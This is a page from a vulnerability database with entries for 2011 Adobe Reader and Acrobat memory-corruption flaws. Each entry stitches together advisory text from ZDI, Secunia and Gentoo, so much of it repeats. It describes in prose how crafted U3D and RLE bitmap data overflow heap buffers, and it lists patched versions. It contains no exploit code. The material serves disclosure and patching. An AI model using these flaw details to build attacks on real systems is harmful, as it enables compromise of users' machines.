Sign-up

VARIoT IoT vulnerabilities database

Affected products: vendor, model and version
CWE format is 'CWE-number'. Threat type can be: remote or local
Look up free text in title and description

VAR-201102-0063 CVE-2011-0591 Adobe Reader and Acrobat Vulnerable to arbitrary code execution CVSS V2: 9.3
CVSS V3: -
Severity: HIGH
Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allow remote attackers to execute arbitrary code via a crafted Universal 3D (U3D) file that triggers a buffer overflow during decompression, related to Texture and rgba, a different vulnerability than CVE-2011-0590, CVE-2011-0592, CVE-2011-0593, CVE-2011-0595, and CVE-2011-0600. Adobe Reader and Acrobat Contains a vulnerability that allows arbitrary code execution. This vulnerability CVE-2011-0590 , CVE-2011-0592 , CVE-2011-0593 , CVE-2011-0595 and CVE-2011-0600 Is a different vulnerability.By a third party 3D An arbitrary code may be executed via the file. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the application's implementation of an image format supported by the Universal 3D compressed file format. When decoding the image data provided by the file, the application will one size for allocating space for the destination buffer and then trust the data when decompressing into that buffer. Due to the decompression being unbounded by the actual buffer size, a buffer overflow can be triggered leading to code execution under the context of the application. For more information: SA43207 SOLUTION: Updated packages are available via Red Hat Network. -- Vendor Response: Adobe has issued an update to correct this vulnerability. More details can be found at: http://www.adobe.com/support/security/bulletins/apsb11-03.html -- Disclosure Timeline: 2010-09-29 - Vulnerability reported to vendor 2011-02-08 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Peter Vreugdenhil ( http://vreugdenhilresearch.nl ) -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ . ---------------------------------------------------------------------- Get a tax break on purchases of Secunia Solutions! If you are a U.S. company, you may be qualified for a tax break for your software purchases. Learn more at: http://secunia.com/products/corporate/vim/section_179/ ---------------------------------------------------------------------- TITLE: Adobe Reader / Acrobat Multiple Vulnerabilities SECUNIA ADVISORY ID: SA43207 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/43207/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=43207 RELEASE DATE: 2011-02-09 DISCUSS ADVISORY: http://secunia.com/advisories/43207/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/43207/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=43207 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Multiple vulnerabilities have been reported in Adobe Reader / Acrobat, which can be exploited by malicious, local users to gain escalated privileges and by malicious people to conduct cross-site scripting attacks and compromise a user's system. 2) An unspecified error can be exploited to corrupt memory. 3) An unspecified error related to file permissions in Windows-based versions can be exploited to gain escalated privileges. 4) An unspecified error may allow code execution. 5) An unspecified error when parsing images can be exploited to corrupt memory. 6) An error in AcroRd32.dll when parsing certain images can be exploited to corrupt memory. 7) An unspecified error in the Macintosh-based versions may allow code execution. 9) An unspecified error may allow code execution. 10) A input validation error may allow code execution. 11) An input validation error can be exploited to conduct cross-site scripting attacks. 13) An unspecified error can be exploited to corrupt memory. 18) An input validation error when parsing fonts may allow code execution. 20) An error in 2d.dll when parsing height and width values of RLE_8 compressed BMP files can be exploited to cause a heap-based buffer overflow. 21) An integer overflow in ACE.dll when parsing certain ICC data can be exploited to cause a buffer overflow. 22) A boundary error in rt3d.dll when parsing bits per pixel and number of colors if 4/8-bit RLE compressed BMP files can be exploited to cause a heap-based buffer overflow. 23) An error in the U3D implementation when handling the Parent Node count can be exploited to cause a buffer overflow. 24) A boundary error when processing JPEG files embedded in a PDF file can be exploited to corrupt heap memory. 25) An unspecified error when parsing images may allow code execution. 26) An input validation error can be exploited to conduct cross-site scripting attacks. 27) An unspecified error in the Macintosh-based versions may allow code execution. 28) A boundary error in rt3d.dll when parsing certain files can be exploited to cause a stack-based buffer overflow. 29) An integer overflow in the U3D implementation when parsing a ILBM texture file can be exploited to cause a buffer overflow. 30) Some vulnerabilities are caused due to vulnerabilities in the bundled version of Adobe Flash Player. For more information: SA43267 The vulnerabilities are reported in versions 8.2.5 and prior, 9.4.1 and prior, and 10.0 and prior. SOLUTION: Update to version 8.2.6, 9.4.2, or 10.0.1. Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ PROVIDED AND/OR DISCOVERED BY: 2) Bing Liu, Fortinet's FortiGuard Labs. 6) Abdullah Ada via ZDI. 8) Haifei Li, Fortinet's FortiGuard Labs. 14 - 17, 19, 20, 22, 29) Peter Vreugdenhil via ZDI. 21) Sebastian Apelt via ZDI. 23) el via ZDI. 14) Sean Larsson, iDefense Labs. 28) An anonymous person via ZDI. The vendor also credits: 1) Mitja Kolsek, ACROS Security. 3) Matthew Pun. 4, 5, 18) Tavis Ormandy, Google Security Team. 7) James Quirk. 9) Brett Gervasoni, Sense of Security. 10) Joe Schatz. 11, 26) Billy Rios, Google Security Team. 12) Greg MacManus, iSIGHT Partners Labs and Parvez Anwar. 13) CESG. 25) Will Dormann, CERT. 27) Marc Schoenefeld, Red Hat Security Response Team. ORIGINAL ADVISORY: Adobe (APSB11-03) http://www.adobe.com/support/security/bulletins/apsb11-03.html http://www.adobe.com/support/security/bulletins/apsb11-02.html ZDI: http://www.zerodayinitiative.com/advisories/ZDI-11-065/ http://www.zerodayinitiative.com/advisories/ZDI-11-066/ http://www.zerodayinitiative.com/advisories/ZDI-11-067/ http://www.zerodayinitiative.com/advisories/ZDI-11-068/ http://www.zerodayinitiative.com/advisories/ZDI-11-069/ http://www.zerodayinitiative.com/advisories/ZDI-11-070/ http://www.zerodayinitiative.com/advisories/ZDI-11-071/ http://www.zerodayinitiative.com/advisories/ZDI-11-072/ http://www.zerodayinitiative.com/advisories/ZDI-11-073/ http://www.zerodayinitiative.com/advisories/ZDI-11-074/ http://www.zerodayinitiative.com/advisories/ZDI-11-075/ http://www.zerodayinitiative.com/advisories/ZDI-11-077/ FortiGuard Labs: http://www.fortiguard.com/advisory/FGA-2011-06.html iDefense: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=891 OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . Please review the CVE identifiers referenced below for details. Workaround ========== There is no known workaround at this time. Resolution ========== All Adobe Reader users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=app-text/acroread-9.4.7" References ========== [ 1 ] CVE-2010-4091 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4091 [ 2 ] CVE-2011-0562 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0562 [ 3 ] CVE-2011-0563 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0563 [ 4 ] CVE-2011-0565 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0565 [ 5 ] CVE-2011-0566 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0566 [ 6 ] CVE-2011-0567 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0567 [ 7 ] CVE-2011-0570 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0570 [ 8 ] CVE-2011-0585 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0585 [ 9 ] CVE-2011-0586 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0586 [ 10 ] CVE-2011-0587 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0587 [ 11 ] CVE-2011-0588 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0588 [ 12 ] CVE-2011-0589 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0589 [ 13 ] CVE-2011-0590 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0590 [ 14 ] CVE-2011-0591 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0591 [ 15 ] CVE-2011-0592 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0592 [ 16 ] CVE-2011-0593 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0593 [ 17 ] CVE-2011-0594 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0594 [ 18 ] CVE-2011-0595 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0595 [ 19 ] CVE-2011-0596 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0596 [ 20 ] CVE-2011-0598 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0598 [ 21 ] CVE-2011-0599 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0599 [ 22 ] CVE-2011-0600 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0600 [ 23 ] CVE-2011-0602 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0602 [ 24 ] CVE-2011-0603 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0603 [ 25 ] CVE-2011-0604 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0604 [ 26 ] CVE-2011-0605 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0605 [ 27 ] CVE-2011-0606 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0606 [ 28 ] CVE-2011-2130 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2130 [ 29 ] CVE-2011-2134 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2134 [ 30 ] CVE-2011-2135 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2135 [ 31 ] CVE-2011-2136 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2136 [ 32 ] CVE-2011-2137 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2137 [ 33 ] CVE-2011-2138 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2138 [ 34 ] CVE-2011-2139 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2139 [ 35 ] CVE-2011-2140 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2140 [ 36 ] CVE-2011-2414 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2414 [ 37 ] CVE-2011-2415 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2415 [ 38 ] CVE-2011-2416 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2416 [ 39 ] CVE-2011-2417 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2417 [ 40 ] CVE-2011-2424 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2424 [ 41 ] CVE-2011-2425 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2425 [ 42 ] CVE-2011-2431 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2431 [ 43 ] CVE-2011-2432 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2432 [ 44 ] CVE-2011-2433 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2433 [ 45 ] CVE-2011-2434 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2434 [ 46 ] CVE-2011-2435 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2435 [ 47 ] CVE-2011-2436 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2436 [ 48 ] CVE-2011-2437 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2437 [ 49 ] CVE-2011-2438 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2438 [ 50 ] CVE-2011-2439 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2439 [ 51 ] CVE-2011-2440 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2440 [ 52 ] CVE-2011-2441 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2441 [ 53 ] CVE-2011-2442 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2442 [ 54 ] CVE-2011-2462 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2462 [ 55 ] CVE-2011-4369 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4369 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201201-19.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2012 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5
VAR-201102-0059 CVE-2011-0599 Adobe Reader and Acrobat Vulnerable to arbitrary code execution CVSS V2: 9.3
CVSS V3: -
Severity: HIGH
The Bitmap parsing component in rt3d.dll in Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allow remote attackers to execute arbitrary code via a crafted image that causes an invalid pointer calculation related to 4/8-bit RLE compression, a different vulnerability than CVE-2011-0596, CVE-2011-0598, and CVE-2011-0602. Adobe Reader and Acrobat Contains a vulnerability that allows arbitrary code execution. This vulnerability CVE-2011-0596 , CVE-2011-0598 and CVE-2011-0602 Is a different vulnerability.A third party may execute arbitrary code through the image. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The flaw exists within the Bitmap parsing component of rt3d.dll. When allocating a destination buffer for handling 4/8-bit RLE compressed bitmaps, the process uses the bitmap bits per pixel and number of colors values directly. A pointer is created based on the specified color depth, which can then be used to copy user supplied data into the fixed-length color data buffer on the heap. For more information: SA43207 SOLUTION: Updated packages are available via Red Hat Network. -- Vendor Response: Adobe has issued an update to correct this vulnerability. More details can be found at: http://www.adobe.com/support/security/bulletins/apsb11-03.html -- Disclosure Timeline: 2010-11-15 - Vulnerability reported to vendor 2011-02-08 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Peter Vreugdenhil ( http://vreugdenhilresearch.nl ) -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ . ---------------------------------------------------------------------- Get a tax break on purchases of Secunia Solutions! If you are a U.S. company, you may be qualified for a tax break for your software purchases. Learn more at: http://secunia.com/products/corporate/vim/section_179/ ---------------------------------------------------------------------- TITLE: Adobe Reader / Acrobat Multiple Vulnerabilities SECUNIA ADVISORY ID: SA43207 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/43207/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=43207 RELEASE DATE: 2011-02-09 DISCUSS ADVISORY: http://secunia.com/advisories/43207/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/43207/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=43207 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Multiple vulnerabilities have been reported in Adobe Reader / Acrobat, which can be exploited by malicious, local users to gain escalated privileges and by malicious people to conduct cross-site scripting attacks and compromise a user's system. 2) An unspecified error can be exploited to corrupt memory. 3) An unspecified error related to file permissions in Windows-based versions can be exploited to gain escalated privileges. 4) An unspecified error may allow code execution. 5) An unspecified error when parsing images can be exploited to corrupt memory. 6) An error in AcroRd32.dll when parsing certain images can be exploited to corrupt memory. 7) An unspecified error in the Macintosh-based versions may allow code execution. 9) An unspecified error may allow code execution. 10) A input validation error may allow code execution. 11) An input validation error can be exploited to conduct cross-site scripting attacks. 13) An unspecified error can be exploited to corrupt memory. 14) A boundary error when decoding U3D image data in an IFF file can be exploited to cause a buffer overflow. 15) A boundary error when decoding U3D image data in a RGBA file can be exploited to cause a buffer overflow. 16) A boundary error when decoding U3D image data in a BMP file can be exploited to cause a buffer overflow. 17) A boundary error when decoding U3D image data in a PSD file can be exploited to cause a buffer overflow. 18) An input validation error when parsing fonts may allow code execution. 19) A boundary error when decoding U3D image data in a FLI file can be exploited to cause a buffer overflow. 20) An error in 2d.dll when parsing height and width values of RLE_8 compressed BMP files can be exploited to cause a heap-based buffer overflow. 21) An integer overflow in ACE.dll when parsing certain ICC data can be exploited to cause a buffer overflow. 23) An error in the U3D implementation when handling the Parent Node count can be exploited to cause a buffer overflow. 24) A boundary error when processing JPEG files embedded in a PDF file can be exploited to corrupt heap memory. 25) An unspecified error when parsing images may allow code execution. 26) An input validation error can be exploited to conduct cross-site scripting attacks. 27) An unspecified error in the Macintosh-based versions may allow code execution. 28) A boundary error in rt3d.dll when parsing certain files can be exploited to cause a stack-based buffer overflow. 29) An integer overflow in the U3D implementation when parsing a ILBM texture file can be exploited to cause a buffer overflow. 30) Some vulnerabilities are caused due to vulnerabilities in the bundled version of Adobe Flash Player. For more information: SA43267 The vulnerabilities are reported in versions 8.2.5 and prior, 9.4.1 and prior, and 10.0 and prior. SOLUTION: Update to version 8.2.6, 9.4.2, or 10.0.1. Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ PROVIDED AND/OR DISCOVERED BY: 2) Bing Liu, Fortinet's FortiGuard Labs. 6) Abdullah Ada via ZDI. 8) Haifei Li, Fortinet's FortiGuard Labs. 14 - 17, 19, 20, 22, 29) Peter Vreugdenhil via ZDI. 21) Sebastian Apelt via ZDI. 23) el via ZDI. 14) Sean Larsson, iDefense Labs. 28) An anonymous person via ZDI. The vendor also credits: 1) Mitja Kolsek, ACROS Security. 3) Matthew Pun. 4, 5, 18) Tavis Ormandy, Google Security Team. 7) James Quirk. 9) Brett Gervasoni, Sense of Security. 10) Joe Schatz. 11, 26) Billy Rios, Google Security Team. 12) Greg MacManus, iSIGHT Partners Labs and Parvez Anwar. 13) CESG. 25) Will Dormann, CERT. 27) Marc Schoenefeld, Red Hat Security Response Team. ORIGINAL ADVISORY: Adobe (APSB11-03) http://www.adobe.com/support/security/bulletins/apsb11-03.html http://www.adobe.com/support/security/bulletins/apsb11-02.html ZDI: http://www.zerodayinitiative.com/advisories/ZDI-11-065/ http://www.zerodayinitiative.com/advisories/ZDI-11-066/ http://www.zerodayinitiative.com/advisories/ZDI-11-067/ http://www.zerodayinitiative.com/advisories/ZDI-11-068/ http://www.zerodayinitiative.com/advisories/ZDI-11-069/ http://www.zerodayinitiative.com/advisories/ZDI-11-070/ http://www.zerodayinitiative.com/advisories/ZDI-11-071/ http://www.zerodayinitiative.com/advisories/ZDI-11-072/ http://www.zerodayinitiative.com/advisories/ZDI-11-073/ http://www.zerodayinitiative.com/advisories/ZDI-11-074/ http://www.zerodayinitiative.com/advisories/ZDI-11-075/ http://www.zerodayinitiative.com/advisories/ZDI-11-077/ FortiGuard Labs: http://www.fortiguard.com/advisory/FGA-2011-06.html iDefense: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=891 OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . Please review the CVE identifiers referenced below for details. Workaround ========== There is no known workaround at this time. Resolution ========== All Adobe Reader users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=app-text/acroread-9.4.7" References ========== [ 1 ] CVE-2010-4091 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4091 [ 2 ] CVE-2011-0562 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0562 [ 3 ] CVE-2011-0563 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0563 [ 4 ] CVE-2011-0565 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0565 [ 5 ] CVE-2011-0566 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0566 [ 6 ] CVE-2011-0567 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0567 [ 7 ] CVE-2011-0570 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0570 [ 8 ] CVE-2011-0585 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0585 [ 9 ] CVE-2011-0586 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0586 [ 10 ] CVE-2011-0587 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0587 [ 11 ] CVE-2011-0588 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0588 [ 12 ] CVE-2011-0589 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0589 [ 13 ] CVE-2011-0590 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0590 [ 14 ] CVE-2011-0591 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0591 [ 15 ] CVE-2011-0592 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0592 [ 16 ] CVE-2011-0593 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0593 [ 17 ] CVE-2011-0594 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0594 [ 18 ] CVE-2011-0595 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0595 [ 19 ] CVE-2011-0596 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0596 [ 20 ] CVE-2011-0598 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0598 [ 21 ] CVE-2011-0599 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0599 [ 22 ] CVE-2011-0600 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0600 [ 23 ] CVE-2011-0602 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0602 [ 24 ] CVE-2011-0603 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0603 [ 25 ] CVE-2011-0604 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0604 [ 26 ] CVE-2011-0605 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0605 [ 27 ] CVE-2011-0606 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0606 [ 28 ] CVE-2011-2130 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2130 [ 29 ] CVE-2011-2134 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2134 [ 30 ] CVE-2011-2135 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2135 [ 31 ] CVE-2011-2136 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2136 [ 32 ] CVE-2011-2137 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2137 [ 33 ] CVE-2011-2138 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2138 [ 34 ] CVE-2011-2139 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2139 [ 35 ] CVE-2011-2140 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2140 [ 36 ] CVE-2011-2414 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2414 [ 37 ] CVE-2011-2415 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2415 [ 38 ] CVE-2011-2416 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2416 [ 39 ] CVE-2011-2417 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2417 [ 40 ] CVE-2011-2424 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2424 [ 41 ] CVE-2011-2425 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2425 [ 42 ] CVE-2011-2431 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2431 [ 43 ] CVE-2011-2432 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2432 [ 44 ] CVE-2011-2433 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2433 [ 45 ] CVE-2011-2434 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2434 [ 46 ] CVE-2011-2435 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2435 [ 47 ] CVE-2011-2436 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2436 [ 48 ] CVE-2011-2437 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2437 [ 49 ] CVE-2011-2438 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2438 [ 50 ] CVE-2011-2439 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2439 [ 51 ] CVE-2011-2440 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2440 [ 52 ] CVE-2011-2441 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2441 [ 53 ] CVE-2011-2442 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2442 [ 54 ] CVE-2011-2462 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2462 [ 55 ] CVE-2011-4369 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4369 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201201-19.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2012 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5
VAR-201102-0032 CVE-2011-0586 Adobe Reader and Acrobat Vulnerable to arbitrary code execution CVSS V2: 9.3
CVSS V3: -
Severity: HIGH
